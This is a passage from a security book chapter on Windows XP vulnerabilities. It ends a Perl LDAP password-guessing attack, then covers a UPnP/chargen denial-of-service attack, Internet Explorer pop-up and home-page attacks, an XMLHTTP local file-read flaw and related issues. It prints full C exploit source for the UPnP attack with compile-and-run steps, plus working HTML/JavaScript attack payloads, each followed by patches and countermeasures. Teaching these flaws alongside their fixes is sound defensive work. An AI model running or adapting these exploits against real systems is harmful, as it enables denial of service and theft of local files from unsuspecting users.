cn=Manager,o=MicroSoft,c=US -b o=Microsoft,c=US
-u Test_User -d –l ./dictionary.txt
USAGE
exit;
}


If successful, the attack would gain unauthorized access to an LDAP database
via a successful user account supplied within the specified dictionary file.This
attack or type of attack would prove very useful on a vulnerability assessment
or when trying to compromise a target utilizing an LDAP server.The code is
written in the Perl scripting language and was tested using the Win32 and Linux
ActiveState binaries (ActiveState’s ActivePerl: www.activestate.com/Solutions/
Programmer/Perl.plex).
To ensure that this type of attack is not successful, you must enforce a strong
password policy. All of the passwords should contain numeric, alpha, and special
characters and should be a minimum of eight characters long. Another way to
limit your exposure would be to create access control lists minimizing the connections
and users that are able to initiate sessions to the LDAP system.

The Plug and Play Denial of Service Attack

The Universal Plug and Play (UPNP) denial of service attack leverages a flaw in
the design of Microsoft’s Plug and Play server. A malformed UDP packet is sent
to port 1900 with a NOTIFY request that contains a URL redirect to a system
with a malicious Chargen server. XP opens the requested URL and initiates a
TCP to the specified system. Due to an error in the server data processing of the
UPNP service, the system does not conduct any error analysis of the redirect
URL, thereby any port and system would be specified. Once the TCP request is
sent to the Chargen server, the Chargen server sends a packet with code that utilizes
all of the XP’s system memory sending it to an immediate state of unuse by
consuming all of the available CPU cycles.
The modified source code for this attack is presented shortly (note that some
lines are wrapped). In order for this attack to work, you need the ability to compile
C source code. It has been tested and verified to work on the RedHat 6.2,
Slackware 7.0, and Windows NT/2000/XP platforms.The following steps are
required to successfully execute this attack:

1. Individually compile both of the programs.
2. Run the Chargen.c executable with the port specified in the Notify
request of the UPNP source code (the current default is port 1900).
3. Run the UPNP.c executable and be sure to use the same port number
that the Chargen server is listening on.

If the system is running the Plug and Play service and is not patched, the
attack should work to the extent that the target system must now be rebooted.

Chargen.c
/* Windows XP Plug-n-Play Chargen Server - Dual Platform Exploit
* Run: ./FASL_Chargen.exe <local Chargen Port>
* Ported and Modified By:
* James C. Foster, Tom Ferris, Jim Kovalchuk, Mike Price, and Chad Curtis
* December 20, 2002 */
//To compile on Win32 you must link with the Ws2_32.lib library at compile
//time
#include <stdio.h>
#ifdef WIN32
#include <Winsock2.h>
#include <Windows.h>
#else
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <malloc.h>
#endif
#define BACKLOG 5
#define MAX 500
int main(int argc, char *argv[]) {
int visit=1;
int i, i2, port, sockfd, newfd, numbytes;
char buf[MAX];
char diedbuf[1024];
#ifdef WIN32
WSADATA wsaData;
#endif
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
int sin_size;
if(argc!=2) {
fprintf(stderr,"usage: %s <chargen_port>\n",argv[0]);
return 1;
}
port=atoi(argv[1]);
#ifdef WIN32
if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
exit(1);
}
#endif
if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(port);
my_addr.sin_addr.s_addr=htonl(INADDR_ANY);
#ifdef WIN32
memset(&(my_addr.sin_zero), 0x0, 8);
#else
bzero(&(my_addr.sin_zero),8);
#endif
if(bind(sockfd, (struct sockaddr *) &my_addr, sizeof(struct sockaddr) ) ==
-1) {
exit(1);
}
if(listen(sockfd, BACKLOG) == -1) {
exit(1);
}
for(i=0;i<1024;i++)
diedbuf[i] = 'q';
while(1) {
sin_size = sizeof(struct sockaddr_in);
if((newfd = accept(sockfd, (struct sockaddr*)&their_addr, &sin_size))==
-1) {
exit(1);
}
#ifndef WIN32
if(!fork()) {
#endif
i2 = 1;
if((numbytes = recv(newfd, buf, MAX, 0)) == -1) {
exit(1);
}
buf[numbytes]='\0';
printf("%s\n", buf);
while(1) {
if(send(newfd,diedbuf,1024,0) ==-1) {
exit(0);
} }
#ifndef WIN32
}
#endif
}
#ifdef WIN32
closesocket(newfd);
#else
close(newfd);
#endif
}
UPNP.c
/* Windows XP Plug-n-Play - Dual Platform Exploit
* ./FASL_uPnP.exe <remote IP> <local IP> <local Chargen Port>
* Ported and Modified By:
* James C. Foster, Tom Ferris, Jim Kovalchuk, Mike Price, and Chad Curtis
* December 20, 2002 */
//To compile on Win32 you must link with the Ws2_32.lib library at compile
//time
#ifdef WIN32 //Library Definitions
#include <Winsock2.h>
#include <Windows.h>
#else
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#endif
#include <stdio.h>
#define MAX 1000
#define PORT 1900
#ifdef WIN32
WSADATA wsaData;
#endif
char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[MAX]="";
char *pt=strstr(string,orig);
strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}
int main(int argc,char *argv[]) {
int sockfd,i;
int numbytes;
int num_socks;
int addr_len;
char recive_buffer[MAX]="";
char send_buffer[MAX]=
"NOTIFY * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
"CACHE-CONTROL: max-age=1\r\nLOCATION: http://www.host.com:port/\r\n"
"NT: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n"
"NTS: ssdp:alive\r\nSERVER: QB0X/201 UPnP/1.0 prouct/1.1\r\n"
"USN: uuid:QB0X\r\n\r\n\r\n";
char *aux=send_buffer;
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=4) {
fprintf(stderr,"Exploit Usage:%s <remote IP> "\
"<local IP> <local Chargen Port>\n",argv[0]);
exit(1); }
#ifdef WIN32
if(WSAStartup(MAKEWORD(2,2), &wsaData) != 0) {
printf("WSAStartup() failed.\n");
exit(1);
}
#endif
aux=str_replace(argv[2],"www.foundstone.com",send_buffer);
aux=str_replace(argv[3],"port",send_buffer);
if((he=gethostbyname(argv[1]))==NULL) {
perror("gethostbyname");
exit(1);
}
if( (sockfd=socket(AF_INET,SOCK_DGRAM,0)) == -1) {
perror("socket"); exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(PORT);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
#ifdef WIN32
memset(&(their_addr.sin_zero),0,8);
#else
bzero(&(their_addr.sin_zero),8);
#endif
if( (numbytes=sendto(sockfd,send_buffer,strlen(send_bu ffer),0,\
(struct sockaddr *)&their_addr, sizeof(struct sockaddr))) ==-1) {
perror("send");
exit(0);
}
#ifdef WIN32
closesocket(sockfd);
#else
close(sockfd);
#endif
return 0; }
}


The UPNP countermeasure for this vulnerability is twofold.You may choose
to install the recommended hotfix or install the Windows XP Professional Service
Pack 1, both of which you can find in the Windows Update Catalog at
http://windowsupdate.microsoft.com.The second choice you have, just as easy
as the first, would be to disable the Plug and Play service for your system. However,
realize that if you do choose to disable this service it will obviously not be available
for any real-time automatic identification or configuration of peripheral devices.
Double-click the Plug and Play service from within the Services Management
interface and change the Startup type to Disabled. Ensure that your configuration
dialog box matches Figure 4.5. Our recommendation is to just patch the
system because the feature is quite helpful. More information on the UPNP vulnerability
can be found at the following links.

 eEye Research Advisory (www.eeye.com/html/Research/Advisories/
AD20011220.html)
 Microsoft Security Bulletin (www.microsoft.com/technet/security/
bulletin/MS01-059.asp)

XP Access Point Information Disclosure

XP Professional comes bundled with the capability to communicate over a wireless
802.11 connection without the need for any additional drivers to be
installed.The access point (AP) registration feature within XP allows a user to
store the commonly-used, or in the case of an enterprise user, the organization’s
access point Service Set identifier (SSID) strings within the operating system
itself.This feature allows a wireless LAN administrator to lock down the AP to
the extent that it does not have to send client broadcast or even respond to Null
AP broadcasts. As shown in Figure 4.6, the XP Professional sends a typical broadcast
802.11 packet searching for available access points.The AP responded with its
SSID, and the system initiates communication, provided that the AP matches an
SSID within the registered configuration.
Figure 4.7 displays how the information leakage actually takes place and how
an attacker could leverage such retrieved data. As with the previous scenario, the
XP Professional system sends a Null broadcast packet with the difference being
that it does not receive a response. It then starts sending specific AP requests that
include the desired SSID strings configured within XP.A looping process starts
allowing the innocent XP system to continually search for the configured access
points via SSID. An attacker could leverage this if they were able to capture one
of the requested SSID packets and configure their AP or 802.11 node to obtain
that same SSID.Thereby the next packet that the innocent client transmitted, you
would be able to send a successful response from the corresponding AP. In XP
Professional, after the client successfully associates with a configured AP, the session
begins. In the case that the Wired Equivalent Protocol (WEP) is utilized, it
sends the WEP key as part of the transmission. So in this case, the attacker could
gain the configured SSIDs within the system and could be on the receiving end
of an unencrypted link to the wire.
Microsoft has not yet released an advisory or statement on the Windows XP
access point information disclosure vulnerability; therefore you have a few
choices for securing your systems. If you want or need to use Microsoft’s
embedded wireless functionality, the first recommendation would be to not store
the SSIDs of the systems you frequently visit. Another way to alleviate the issue is
to utilize a third-party driver in the stead of the Microsoft developed 802.11
wireless drivers. As always, if you do not use the service, in this case the wireless
service, disable it from the System Services Management Interface.

Local Exploits

Local exploits usually require multiple prerequisites for the attacks to work, and
statistically most are related to unauthorized information disclosure or system
denial of service.The most popular slew of local attacks was released when Java
was first introduced as a fully-featured mobile code language of the Internet.
Numerous flaws in the language design allowed attackers to create infinite loops
that caused a complete denial of service, to grabbing local files and sending them
to a Web site of choice, to the most dangerous executing of arbitrary files locally
through a whole in the Java Virtual Machine. Most of the XP Professional–
specific or inclusion attacks can be exploited with the Internet Explorer’s implementation
of key scripting and programming parser engines.
JavaScript and the Microsoft implementation, JScript, have become two of the
most popular mobile code Web scripting languages. Due to the popularity and
continuous increase in scripting language functionality, numerous vulnerabilities
have been identified. In most cases, the public vulnerabilities target the browser
or system implementation flaw of the bugs and not the built-in language functionality.
Security controls such as the Software Restriction Policy and advanced
browser settings help combat these types of vulnerabilities, but no current
method alleviates all of the issues.This section provides you with details for
coding attacks to take advantage of unpatched and uneducated Web users via
Internet Explorer and XP design flaws.


The Internet Explorer JavaScript IE Modeless Pop-Up DoS

The JavaScript IE reboot attack exploits a flaw in Internet Explorer to the extent
that it automatically requires the system to restart by consuming all of the available
resources.The implementation flaw of IE allows an indefinite loop to be
created that continuously pops up new browsers until you cannot possibly stop
the ongoing process.The attack is exponentially aggressive since each new thread
of the attack starts a new thread of the continuous loop.
The following is the JavaScript code to exploit the attack.You must place this
HTML code into a file called fploit.html.

<html>
<head>
<script type="javascript">
function exploit() {
while(1) {
showModelessDialog("fploit.html");
}
</script>
</head>
<body onLoad="exploit">
</body>
</html>

To fix this annoying little problem, you can either patch your browser or disable
JavaScript within your Advanced Security Control settings within IE.The
browser modifies that fashion in which files are opened via JavaScript functions.

The Internet Explorer JavaScript Change Home Page

This JavaScript browser hack has quickly become one of the most popular
mobile code attacks on the Internet.The flaw allows Web sites to replace the current configuration of the home page for the browser to be modified by automated
script code. It is extremely devious since it could automatically set your
page to a malicious Web site, a Web site that may be against company policy, or
merely a site that you would not have visited otherwise. In all reality, the extent
of the vulnerability can be compared to that of an automated Web site redirect.
The actual exploit script code shown here details the executed functions and the
location for you to input the new desired home page address:

<a href="#" onClick="this.style.behavior='url(#default#homepage)';
this.setHomePage('http://www.poc2.com');">
<font color="black">go ahead and change it</a>

To fix this IE issue, you would need to update your IE browser to the latest
version supplied by Microsoft since the problem was addressed in the release of
IE 6.The IE engineers have added a protection that creates an automatic pop-up
window alerting you when a Web site attempts to automatically change your
home page, as shown in Figure 4.8.

The Internet Explorer XMLHTTP Active X Bug

The Internet Explorer XMLHTTP Active X bug allows a remote Web server to
retrieve and read arbitrary files located locally on the target system. It has not
proven capable for modifying, deleting, or writing to any system files or directories.
The XMLHTTP control is bundled with the Microsoft core XML services that are
used in parsing XML formatted data. It allows for the system to use Hypertext
Transfer Protocol (HTTP) functions such as GET, POST, and PUT to aid in utilizing
XML files. Microsoft’s software flaw was its implementation of the security
control over a redirected data stream requested from a data request to a Web site.
In order for the vulnerability to work, the malicious user needs to know the
complete path to the target file on the target system. A suitable target file is a file
that is located on all systems and is in cleartext. Another obvious prerequisite of
the attack is that a user must initiate a connection to a malicious Web site.
Because of this, it is hard to target specific systems. Moreover, the malicious site
and attacker would target site visitors using a vulnerable browser on a specific
operating system. If you think it sounds like there are a lot of “ifs,” you are absolutely right. In general, client-side vulnerabilities require a great deal of
chance and in most cases do not provide the instant attacker gratification of
obtaining Administrator quickly.Any cleartext file that can be perceived as valuable
could be an ample target file.The C:\Windows\System32\AutoExec.NT
file is a perfect example of the type of file that could be targeted.The following
code is a proof of concept script that exploits the XMLHTTP bug:


<HTML>
<BODY onload="KickIt()">
<h4>Back to <a href="/unpatched/">Unpatched IE vulnerabilities</a></h4>
<script language="jscript">
function KickIt() {
var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
var sURL = "xmlhttp.asp?file=" + escape(whichFile.value) + "&rand="
+ (new Date()).getTime()
xmlhttp.Open("GET", sURL, false);
try{xmlhttp.Send();}
catch(e){
return Stuff.innerText = "File not found"
}
Stuff.innerText = xmlhttp.responseText
}
</script>
<P>Here you go, your
file:///<input type=text style="border:1px solid;width:300px" value=
"C:/TARGET_LOCAL_FILE" onchange="KickIt()" id=whichFile tabindex=1> file
<input type=button onclick="KickIt()" style="border:1px solid black" value=
"Read file">
</P>
<xmp id=Stuff tabindex=-1></xmp>
<BODY></HTML>

The countermeasure for this bug is simply an IE hotfix 9MS02-008) that was
released soon after the release of the vulnerability. For more information on the
patch and the installation process, refer to the Microsoft Technet security bulletin
at www.microsoft.com/technet/security/bulletin/MS02-008.asp.

The XP Restore Bug

Microsoft Windows XP Professional and Home editions store sensitive system
restore information in the System32 Volume Information directory.Via a default
installation, this directory has adequate access security controls and permissions;
however, unless reconfigured, the subfolders do not inherit these controls.This
allows users who may not have the appropriate privileges to view files and the
contents of any of the subdirectories if they know the full path of the targeted
file.This vulnerability is also one of local access that would allow a malicious user
to gain sensitive system information and also the potential of placing executable
code in shared space on the system.The fix for this issue is rather simple; you
must ensure that only the Administrators group, or whatever group you deem
appropriate, has access to the System32 Volume Information subdirectories.

The Internet Explorer 6.0 Upgrade and Downgrade Issue

A problem has been identified in the upgrade process from a previous Windows
system to XP Professional. It is an atypical problem because it is not the common
type of vulnerability that can be exploited remotely or even locally. However, one
can utilize a flaw in the upgrade process designed by Microsoft.The situation
exists when you are upgrading an old system such as Windows 98 or 2000 to XP
Professional and you already have a patched version of Internet Explorer 6.0
installed. It was published that the IE 6.0 patches and hotfixes do not roll over
with the system upgrade, thereby leaving an unpatched browser.The vulnerability
increases in risk when users may believe they are running a completely patched
version of Internet Explorer 6.0, thus thinking they are invulnerable to multiple
browser client-side type attacks such as information disclosure and arbitrary code
execution.
One other issue that may pose as an obstacle is that Microsoft does not provide
the capability to provide the old patches and hotfixes via the automated Windows
Update service.This poses serious issues when attempting to lock down your
system from a server and client perspective. As stated, this vulnerability is atypical,
but I include it here for user awareness and informational purposes.